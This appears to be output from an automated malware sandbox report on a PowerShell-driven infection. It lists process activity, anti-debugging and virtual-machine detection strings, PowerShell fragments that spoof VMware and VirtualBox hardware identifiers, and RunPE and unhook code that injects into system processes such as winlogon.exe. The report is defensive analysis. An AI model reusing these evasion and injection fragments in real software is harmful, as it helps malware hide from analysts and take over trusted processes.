Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F1197DD894 FindFirstFileExW,21_2_000001F1197DD894
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F1197DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001F1197DDA18
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F119D5D894 FindFirstFileExW,21_2_000001F119D5D894
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F119D5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001F119D5DA18
Source: C:\Windows\System32\conhost.exeCode function: 22_2_00000166BE49D894 FindFirstFileExW,22_2_00000166BE49D894
Source: C:\Windows\System32\conhost.exeCode function: 22_2_00000166BE49DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_00000166BE49DA18
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A927D894 FindFirstFileExW,37_2_00000279A927D894
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A927DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,37_2_00000279A927DA18
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A92AD894 FindFirstFileExW,37_2_00000279A92AD894
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A92ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,37_2_00000279A92ADA18
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D1ED894 FindFirstFileExW,38_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D21D894 FindFirstFileExW,38_2_000001CA7D21D894
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD5D894 FindFirstFileExW,39_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD8DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_0000017D2DD8DA18
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD8D894 FindFirstFileExW,39_2_0000017D2DD8D894
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: cmd.exe, 00000015.00000003.1535784995.000001F119887000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000015.00000003.1536278387.000001F119887000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000015.00000003.1536898836.000001F119887000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000015.00000003.1535847756.000001F119887000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000015.00000003.1537050495.000001F119887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: svchost.exe, 00000031.00000000.1808026168.000002A769A42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2560040120.000002A769A42000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: cmd.exe, 00000015.00000003.1518550469.000001F119887000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000015.00000003.1518671399.000001F119887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" l>
Source: lsass.exe, 00000027.00000002.2556158078.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 00000031.00000002.2560040120.000002A769A42000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
Source: svchost.exe, 0000002C.00000002.2604848286.000002287B013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 00000031.00000003.2523416101.000002A76AFB4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dcPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: dwm.exe, 00000029.00000002.2625112996.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dRomNECVMWarVMware_SATA_
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000031.00000000.1809108421.000002A76A110000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 00000031.00000003.1840165634.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: svchost.exe, 00000031.00000003.1841141732.000002A76A5D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: storahciNECVMWarVMware SATA CD00
Source: svchost.exe, 00000031.00000000.1809108421.000002A76A110000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000031.00000003.1840165634.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: svchost.exe, 00000031.00000003.2523416101.000002A76AFB4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: dwm.exe, 00000029.00000002.2625112996.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Bus\0000SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000PCI\VEN_8
Source: svchost.exe, 00000031.00000003.1871573480.000002A76AE4F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: lsass.exe, 00000027.00000000.1746151220.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2550891542.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.1757706895.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2541644884.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000002.2543422273.000001EF0502B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000000.1765464354.000001EF0502F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2555397450.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.1769945734.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1780217992.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2539103684.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2559244462.000002A769A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: dwm.exe, 00000029.00000002.2625112996.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 00000031.00000000.1808270904.000002A769A9C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMCI: Using capabilities (0x1c).
Source: lsass.exe, 00000027.00000002.2556158078.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
Source: cmd.exe, 00000015.00000003.1517952698.000001F119832000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A"
Source: svchost.exe, 00000031.00000003.1871573480.000002A76AE4F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 00000031.00000003.1840165634.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc@
Source: cmd.exe, 00000015.00000003.1518550469.000001F119887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopAATbTHawUmfcLAkpDTVWwYrBvRW=artsWith(':: 'AfGxgsffmPynRrkaaBfopYTVBXUiYbcfNbefYCi=ng[]]$qObbT.SpaJseWahXuVTWAzmKhplEdiHgShYWW=ieonim.oniIoniajZxexzXrSdyCDQTLTPqWfytPKPjfxCdJRBfcEC=iIoninonivonioALLUSERSPROFILE=C:\
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000031.00000003.1840165634.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc8
Source: svchost.exe, 00000031.00000003.1840165634.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 00000031.00000000.1810437566.000002A76A49A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmcir:m
Source: svchost.exe, 00000031.00000003.1871573480.000002A76AE4F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000037.00000002.2545884887.000002517802B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 0000002D.00000000.1780082619.000001B94D400000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000027.00000002.2556158078.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
Source: svchost.exe, 00000028.00000002.2541644884.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@3
Source: svchost.exe, 00000031.00000003.1871573480.000002A76AE4F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 00000031.00000003.1871573480.000002A76AE4F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 00000029.00000002.2625112996.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000031.00000003.1871573480.000002A76AE4F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_37-15457
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_37-15626
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F1197DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001F1197DCD80
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F1197D1E3C LoadLibraryA,GetProcAddress,SleepEx,21_2_000001F1197D1E3C
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F1197D1D30 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,21_2_000001F1197D1D30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F1197DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001F1197DCD80
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F1197D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_000001F1197D8814
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F1197D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001F1197D84B0
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F119D5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001F119D5CD80
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F119D584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001F119D584B0
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F119D58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_000001F119D58814
Source: C:\Windows\System32\conhost.exeCode function: 22_2_00000166BE498814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00000166BE498814
Source: C:\Windows\System32\conhost.exeCode function: 22_2_00000166BE4984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00000166BE4984B0
Source: C:\Windows\System32\conhost.exeCode function: 22_2_00000166BE49CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00000166BE49CD80
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A92784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_00000279A92784B0
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A9278814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_00000279A9278814
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A927CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_00000279A927CD80
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A92A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_00000279A92A84B0
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A92A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_00000279A92A8814
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A92ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_00000279A92ACD80
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D1E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_000001CA7D1E84B0
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D1ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_000001CA7D1ECD80
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D1E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_000001CA7D1E8814
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D2184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_000001CA7D2184B0
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D21CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_000001CA7D21CD80
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D218814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_000001CA7D218814
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_0000017D2DD5CD80
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_0000017D2DD584B0
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_0000017D2DD58814
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD8CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_0000017D2DD8CD80
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD884B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_0000017D2DD884B0
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD88814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_0000017D2DD88814

HIPS / PFW / Operating System Protection Evasion

barindex
Source: 33.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 34.2.powershell.exe.225536e9b98.13.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 34.2.powershell.exe.2255bd40000.15.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 33.2.powershell.exe.4040b0.1.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 33.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 33.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 33.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 33.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,37_2_0000000140002434
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 83F0000
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2EBC
